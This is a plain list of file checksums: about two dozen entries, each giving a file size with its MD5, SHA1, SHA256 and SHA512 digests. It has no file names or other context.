SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

Filesize 1.4MB
MD5 4a01f3a6efccd47150a97d7490fd8628
SHA1 284af830ac0e558607a6a34cf6e4f6edc263aee1
SHA256 e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97
SHA512 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519

Filesize 234KB
MD5 c1778eeb18deadec6c4c72d97adbf91c
SHA1 9eac9677278acc3a85e70bd8077dff2519afd126
SHA256 8c3063bb4864e1afa83c66635137cf06cd662b0a34735da4e2536092caeaa85e
SHA512 24c85ea9226ce490b341c0926feac9cf7cfcb82d85b4c0b3b3fe4ce54bbabcafdc08ef80221f066780dd85787cf8e15806a43228478c28ae1628afaa2102f151

Filesize 440KB
MD5 118cf2a718ebcf02996fa9ec92966386
SHA1 f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA256 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512 fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089

Filesize 332KB
MD5 043156651ac4912a8ceab1f202b6aa1a
SHA1 303a75c18efee001d1530b4e182b7707b1dad2e1
SHA256 4d183683cafefa0dc3cc6b4c550f600c233218a6d8e5ddd9d17b75c2429d6067
SHA512 12acfbac5778caa22cdaaff9459f1edf5cbe792d90a5a018b963184349711850ec5a65ada10226718e0e3516dc180587159fe9144003e2abb8d2fdef92158c82

Filesize 666KB
MD5 6fd378352fd64b85a7517960a32be0aa
SHA1 4c07c3c72281a1e576982e641b95841f22490efd
SHA256 ec5ac0997cbf0de77a259e948ed67bacb96f2cf7b01eef052ceaacf15d524071
SHA512 6e2a00dd2dc0392b38e3a1b428a339d3adb2d9abd71b28eaaf3e770f6073daf55834d279b2dfe4fd463f3b470c00da09046d5a60aa792bdf9546fa2669e791a7

Filesize 75KB
MD5 2125dd7e77f411376407cbf376de966b
SHA1 9c74f6d9e4083642642e1a9738b4062295df89eb
SHA256 c33bcdf4fec1a287615e9c94c5c669023543e1e8947e1dc74d180aabebbb2513
SHA512 a0d57cdff8f8d035639a51dd4666cd9406fab29da1af33a5b071c99d6fc6ae4bd42d8e32d7e2f9bac2644d73c82ee2140a9e42ee3d5d651989689682ae431932

Filesize 421KB
MD5 c98eface79668b47eb3762cddc622d03
SHA1 7c6c5b6340a80d08f66498acb9ef12af5613f95c
SHA256 aebb5bf113fdefe708394755a3e7498d4e1599e0958760beeb8dce38514345f6
SHA512 8a56fc1386e2caa9f7a1d83e485df89c6359eb13addfc57f80014f415e4ec0cffd59177d8317c8840630dd4667677040a8af0094944e8ef4c21db34b96fd878a

Filesize 1.5MB
MD5 d4de12108a068accedd0111d9f929bc9
SHA1 853cbcd7765e9fc3d0d778563d11bb41153e94dd
SHA256 7dfce4f0b796f94bdfe9b151ef14fdad018c8ed02017bf1e26b087f192c4e364
SHA512 77dbc40615bc33f12ed26b23584e11b8e8ad66b408980adf973920a325f01803975ee99afec93b19e4cde14361d027226769f6d82e6fe4a6a56708b455de5ebe

Filesize 1.2MB
MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

Filesize 89KB
MD5 b7ed5241d23ac01a2e531791d5130ca2
SHA1 49df6413239d15e9464ed4d0d62e3d62064a45e9
SHA256 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436
SHA512 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126

Filesize 218KB
MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Filesize 54KB
MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Filesize 113KB
MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Filesize 647KB
MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Filesize 69KB
MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Filesize 2.1MB
MD5 c489ef99c6d3b18042216af41f4bf401
SHA1 ce2680c16aa94bbf01c45f4858841497f37c8559
SHA256 de655d5f8b91fa54afc00aa95f45fc2b852ddc072d9169f6fa7f3fba3d02a974
SHA512 5436e2fa722b148b95b6704ad16d2cf795a97c62e7eff48355e34ba7118f55e88f2a5902fdd8b756128d002237c5a1145116732bed76ab83153c994479c224ab

Filesize 2B
MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 231KB
MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

Filesize 1.3MB
MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

Filesize 4.1MB
MD5 285d53fb7033d07f7c78174e16051576
SHA1 06f1aeb9d198646a6fa35a40b3eeef8874539073
SHA256 ae66596008f62ccf929050a77e28a7c736db63b417d8319e8f6974151c00b4c8
SHA512 7b5c37fe655ab9d39b0fe297c217f70bbaa0ca996885266f965b61ea20ea567582f5eb44008464d60edfc7b62462d786674afff99a74c9feb2d4f9a7faa61b75

Filesize 486KB
MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6